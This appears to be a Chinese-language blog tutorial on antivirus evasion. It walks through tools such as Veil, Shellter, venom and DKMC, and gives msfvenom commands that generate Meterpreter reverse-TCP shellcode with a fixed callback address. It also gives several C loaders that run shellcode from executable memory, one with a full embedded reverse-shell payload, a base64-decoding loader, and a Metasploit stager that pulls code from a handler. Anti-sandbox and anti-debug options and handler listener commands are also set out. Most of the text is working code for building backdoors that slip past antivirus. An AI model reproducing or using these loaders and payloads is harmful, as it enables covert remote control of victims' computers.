龙空技术网

带你了解 免杀的小知识

白帽hacker淬炼 195

前言:

今天你们对“c语言msf”都比较着重,小伙伴们都想要学习一些“c语言msf”的相关知识。那么小编同时在网上网罗了一些有关“c语言msf””的相关内容,希望兄弟们能喜欢,咱们快快来学习一下吧!

一、杀软常见的三种方式

二、免杀的三种常用方式

三、利用工具实现免杀

1、veil工具基础实现免杀+进阶

2、venom免杀

3、利用kali自带的shellter进行免杀

4、利用avet实现免杀

四、利用源码编译+加载器加载代码实现免杀

1)方式一,cs+c语言代码组合拳

2)方式二,msf+c语言源代码

五、FourEye免杀

六、DKMC免杀

七、思维导图

一、杀软常见的三种方式

静态查杀(邮件类查杀一般是静态的)-->一般根据特征码识别到-->对文件进行特征匹配的思路

云查杀

行为查杀(也可以理解为动态查杀)-->对其产生的行为进行检测

3.1 可构建行为库进行动态查杀

3.2 可构建日志库对日志库进行动态查杀

3.3 统计学检测-->构建特征学习模型-->进行动态查获取就好了

二、免杀的三种常用方式

①捆绑-->文件捆绑,自解压捆绑,如exe类型的

②特征码混淆思路-->即混淆特征码进而绕过免杀

三种方式:

2.1 代码混淆

2.2 api钩子(函数混淆类)-->典型dll劫持类型-->即伪造一个dll文件,然后在调用dll文件的时候,先调用伪造的dll文件,在调用真实的dll文件,进而实现处理木马的操作。

2.3 溢出类型漏洞特点类

③白名单-->原理:杀毒软件对自己旗下的软件不检测导致

三、利用工具实现免杀1,veil工具基础实现免杀+进阶

①启动方法

cd /optlsveil(运行veil即可)

使用方法

如 生成go语言的免杀马

use 1listuse 16set lhost ipset lport 端口generate#(执行即可)

监听–>利用msf进行监听即可

use exploit/multi/handler#选择监听模块类msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lport 3334msf5 exploit(multi/handler) > set lport 10.211.55.2msf5 exploit(multi/handler) > exploit

②结合cs进行免杀

实操(生成go语言的免杀马)

1)、cs使用生成一个go语言类型的payload

2)、

use1

use 17

3)需要的设置变量类(具体参数设置的含义)

BADMACS 设置为Y表示 查看运行环境的MAC地址如果不是虚拟机才会执行payload (反调试)CLICKTRACK 设置为4表示 表示需要4次点击才会执行CURSORCHECK 设置为100表示 运行环境的硬盘大小如果大于100GB才会执行payload (反沙箱)COMPILE_TO_EXE 设置为Y表示 编译为exe文件HOSTNAME 设置为Comp1表示 只有在Hostname计算机名为Comp1时才会执行payload(指定目标环境 反沙箱的方式)INJECT_METHOD 可设置为Virtual 或 HeapMINPROCS 设置为20表示 只有运行环境的运行进程数大于20时才会执行payload(指定目标环境 反沙箱的方式)PROCCHECK 设置为Y表示 只有运行环境的进程中没有虚拟机进程时才会执行payload(指定目标环境 反沙箱的方式)PROCESSORS 设置为2表示 只在至少2核的机器中才会执行payload(指定目标环境 反沙箱的方式)RAMCHECK 设置为Y表示 只在运行环境的内存为3G以上时才会执行payload(指定目标环境 反沙箱的方式)SLEEP 设置为10表示 休眠10秒 以检测是否运行过程中被加速(反沙箱)USERNAME 设置为Tom表示 只有在当前用户名为Tom的机器中才执行payload。USERPROMPT 设置为Y表示 在injection之前提醒用户(提示一个错误框,让用户误以为该程序执行错误才无法打开)DEBUGGER 设置为Y表示 当被调试器不被attached时才会执行payload (反调试)DOMAIN 设置为Comp表示 受害者计算机只有加入Comp域中时,才会执行payload(指定目标环境 反沙箱的方式)UTCCHECK 设置为Y表示 只在运行环境的系统使用UTC时间时,才会执行payload

4)设置

set USERNAME lll#前三个均表示在该特定的情况下执行这个木马set HOSTNAME win7set UTCcheck TRUEset UTCcheck TRUEgenerate#(即代表设置完成的含义状况特点)

5)然后选择3,即自定义字符串的含义

输入cs生成的字符串即可

6)设置名字

即可完成组合拳

③结合mingw-w64

生成payload后

利用mingw-w64进行编译进行实现免杀的作用

gcc -o c.exe c.c -l ws2_32#即过滤掉该命令的状况思路

2,venom免杀

打开方法

./venom.sh

windows下的基础免杀

命令步骤

24#输入ip,输入端口#选择常规的windows/meterperter/reverse_tcp#输入文件名#后面均选默认即可

3,利用kali自带的shellter进行免杀

基础生成命令

选择A#(即自动模式)选择注入的程序选择是否要用隐身模式(建议不使用,免杀效果会变差)选择自定义字符还是自动字符选择模块#一般是选择1模块设置ip,设置端口

监听方法

handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp(监听方法)

4、利用avet实现免杀

运行

#进入其的目录#然后 python 其py程序即可

一般是直接选择2生成一个payload

四、利用源码编译+加载器加载代码实现免杀

方式一

cs+c语言代码组合拳

可参考:

方式二,msf+c语言源代码

思路和cs实现免杀的思路差不多,利用编译进行绕过实现的

①首先现在msf中生成shellcode

c语言代码1

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333  -f c -o shell.c

②在c语言代码的buf[]=中添加该shell然后进行编译即可

unsigned char buf[] = "shellcode";#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口main(){    ( (void(*)(void))&buf)();}

c语言代码2

免杀生成出现问题

#include <Windows.h>#include <stdio.h>#include <string.h>#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口unsigned char buf[] = "shellcode";main(){    char *Memory;     Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    memcpy(Memory, buf, sizeof(buf));    ((void(*)())Memory)();}

#include<windows.h>#include<stdio.h>unsigned char buf[] ="\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30""\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff""\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52""\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1""\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b""\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03""\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b""\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24""\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb""\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c""\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54""\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x2b\x99""\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50""\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5""\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67""\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff""\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00""\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56""\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58""\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5""\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85""\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1""\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";size_t size = sizeof(buf);int main(){  char *inject;  inject = (char*)VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  //分配可读可写可执行  memcpy(inject, buf, size);//复制大小进去  ((void(*)())inject)();//执行}

c语言代码3

#include <windows.h>#include <stdio.h>#pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] ="";void main(){        __asm    {        mov eax, offset shellcode        jmp eax    }}

c语言代码4

#include <windows.h>#include <stdio.h>unsigned char buf[] ="";void main(){   ((void(WINAPI*)(void))&buf)();}

c语言代码5(汇编花指令)

注意:生成的exe文件需要环境中有几个.dll文件才可运行

#include <windows.h>#include <stdio.h>#pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] ="";void main(){        __asm    {        mov eax, offset shellcode        _emit 0xFF          _emit 0xE0    }}

c语言代码6

base4.c代码

/* Base64 encoder/decoder. Originally Apache file ap_base64.c*/#include <string.h>#include "base64.h"/* aaaack but it's fast and const should make it shared text page. */static const unsigned char pr2six[256] ={    /* ASCII table */    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,    52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,    64,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14,    15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,    64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,    41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64};int Base64decode_len(const char *bufcoded){    int nbytesdecoded;    register const unsigned char *bufin;    register int nprbytes;    bufin = (const unsigned char *)bufcoded;    while (pr2six[*(bufin++)] <= 63);    nprbytes = (bufin - (const unsigned char *)bufcoded) - 1;    nbytesdecoded = ((nprbytes + 3) / 4) * 3;    return nbytesdecoded + 1;}int Base64decode(char *bufplain, const char *bufcoded){    int nbytesdecoded;    register const unsigned char *bufin;    register unsigned char *bufout;    register int nprbytes;    bufin = (const unsigned char *)bufcoded;    while (pr2six[*(bufin++)] <= 63);    nprbytes = (bufin - (const unsigned char *)bufcoded) - 1;    nbytesdecoded = ((nprbytes + 3) / 4) * 3;    bufout = (unsigned char *)bufplain;    bufin = (const unsigned char *)bufcoded;    while (nprbytes > 4) {        *(bufout++) =            (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);        *(bufout++) =            (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);        *(bufout++) =            (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);        bufin += 4;        nprbytes -= 4;    }    /* Note: (nprbytes == 1) would be an error, so just ingore that case */    if (nprbytes > 1) {        *(bufout++) =            (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);    }    if (nprbytes > 2) {        *(bufout++) =            (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);    }    if (nprbytes > 3) {        *(bufout++) =            (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);    }    *(bufout++) = '\0';    nbytesdecoded -= (4 - nprbytes) & 3;    return nbytesdecoded;}static const char basis_64[] ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";int Base64encode_len(int len){    return ((len + 2) / 3 * 4) + 1;}int Base64encode(char *encoded, const char *string, int len){    int i;    char *p;    p = encoded;    for (i = 0; i < len - 2; i += 3) {        *p++ = basis_64[(string[i] >> 2) & 0x3F];        *p++ = basis_64[((string[i] & 0x3) << 4) |            ((int)(string[i + 1] & 0xF0) >> 4)];        *p++ = basis_64[((string[i + 1] & 0xF) << 2) |            ((int)(string[i + 2] & 0xC0) >> 6)];        *p++ = basis_64[string[i + 2] & 0x3F];    }    if (i < len) {        *p++ = basis_64[(string[i] >> 2) & 0x3F];        if (i == (len - 1)) {            *p++ = basis_64[((string[i] & 0x3) << 4)];            //    *p++ = '=';        }        else {            *p++ = basis_64[((string[i] & 0x3) << 4) |                ((int)(string[i + 1] & 0xF0) >> 4)];            *p++ = basis_64[((string[i + 1] & 0xF) << 2)];        }        //*p++ = '=';    }    *p++ = '\0';    return p - encoded;}

base64.h代码

#ifndef _BASE64_H_#define _BASE64_H_#ifdef __cplusplusextern "C" {#endif    int Base64encode_len(int len);    int Base64encode(char * coded_dst, const char *plain_src, int len_plain_src);    int Base64decode_len(const char * coded_src);    int Base64decode(char * plain_dst, const char *coded_src);#ifdef __cplusplus}#endif#endif //_BASE64_H_shellcode.c#include <Windows.h>#include <stdio.h>#include <string.h>#include "base64.h"unsigned char buf[] ="msf base64 code here";int main(int argc, const char * argv[]) {    char str1[1000] = { 0 };    Base64decode(str1, buf);    //printf("%d  ", sizeof(str3));    char *Memory;    Memory = VirtualAlloc(NULL, sizeof(str1), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    memcpy(Memory, str1, sizeof(str1));    ((void(*)())Memory)();    return 0;}

msf生成base64的shellcode

msfvenom -p  windows/meterpreter/reverse_tcp --encrypt base64  lhost=10.211.55.2 lport=3333  -f c > shell.c

gcc编码

gcc shellcode.c base64.c -o test.exe

③进行监听

use multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 10.211.55.2set LPORT 3333set EnableStageEncoding true

五、FourEye免杀

kali环境下使用

直接使用即可

python3 BypassFramework.py
加载器方法1.使用shellcode_launcher

①生成raw格式的shellcode

 msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333  -f raw -o shellcode.raw

shellcode_launcher执行产生exe文件

shellcode_launcher.exe -i shellcode.raw#1

六、DKMC免杀

[*] (gen)  将msf的shellcode注入到一个BMP图像[*] (web)  启动web服务用来分发BMP图像[*] (ps)  生成ps的payload[*] (sc)  将msf生成的raw文件转为shellcode[*] (exit)  退出

生成步骤与原理

先利用msf生成raw文件利用sc讲raw文件转换为shellcode利用gen将上一步的shellcode注入到一个BMP图像利用ps生成基于powershell的BMP文件的payload用web提供的简单web服务进行分发BMP文件
详细参考教程:

七、思维导图

meta64位过杀软

过32位

/* * A C-based stager client compat with the Metasploit Framework *    based on a discussion on the Metasploit Framework mailing list * * @作者 Raphael Mudge (raffi@strategiccyber.com) * @license BSD License. * * Relevant messages: * * 月/008660.html * * 月/008664.html */#include <stdio.h>#include <stdlib.h>#include <windows.h>#include <winsock2.h>/* init winsock */void winsock_init() {  WSADATA  wsaData;  WORD     wVersionRequested;  wVersionRequested = MAKEWORD(2, 2);  if (WSAStartup(wVersionRequested, &wsaData) < 0) {    printf("ws2_32.dll is out of date.\n");    WSACleanup();    exit(1);  }}/* a quick routine to quit and report why we quit */void punt(SOCKET my_socket, char * error) {  printf("Bad things: %s\n", error);  closesocket(my_socket);  WSACleanup();  exit(1);}/* attempt to receive all of the requested data from the socket */int recv_all(SOCKET my_socket, void * buffer, int len) {  int    tret   = 0;  int    nret   = 0;  void * startb = buffer;  while (tret < len) {    nret = recv(my_socket, (char *)startb, len - tret, 0);    startb += nret;    tret   += nret;    if (nret == SOCKET_ERROR)      punt(my_socket, "Could not receive data");  }  return tret;}/* establish a connection to a host:port */SOCKET wsconnect(char * targetip, int port) {  struct hostent *    target;  struct sockaddr_in   sock;  SOCKET       my_socket;  /* setup our socket */  my_socket = socket(AF_INET, SOCK_STREAM, 0);  if (my_socket == INVALID_SOCKET)    punt(my_socket, "Could not initialize socket");  /* resolve our target */  target = gethostbyname(targetip);  if (target == NULL)    punt(my_socket, "Could not resolve target");  /* copy our target information into the sock */  memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);  sock.sin_family = AF_INET;  sock.sin_port = htons(port);  /* attempt to connect */  if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )    punt(my_socket, "Could not connect to target");  return my_socket;}int main(int argc, char * argv[]) {  ULONG32 size;  char * buffer;  void (*function)();  winsock_init();  if (argc != 3) {    printf("%s [host] [port]\n", argv[0]);    exit(1);  }  /* connect to the handler */  SOCKET my_socket = wsconnect(argv[1], atoi(argv[2]));  /* read the 4-byte length */  int count = recv(my_socket, (char *)&size, 4, 0);  if (count != 4 || size <= 0)    punt(my_socket, "read a strange or incomplete length value\n");  /* allocate a RWX buffer */  buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  if (buffer == NULL)    punt(my_socket, "could not allocate buffer\n");  /* prepend a little assembly to move our SOCKET value to the EDI register     thanks mihi for pointing this out     BF 78 56 34 12     =>      mov edi, 0x12345678 */  buffer[0] = 0xBF;  /* copy the value of our socket to the buffer */  memcpy(buffer + 1, &my_socket, 4);  /* read bytes into the buffer */  count = recv_all(my_socket, buffer + 5, size);  /* cast our buffer as a function and call it */  function = (void (*)())buffer;  function();  return 0;}

标签: #c语言msf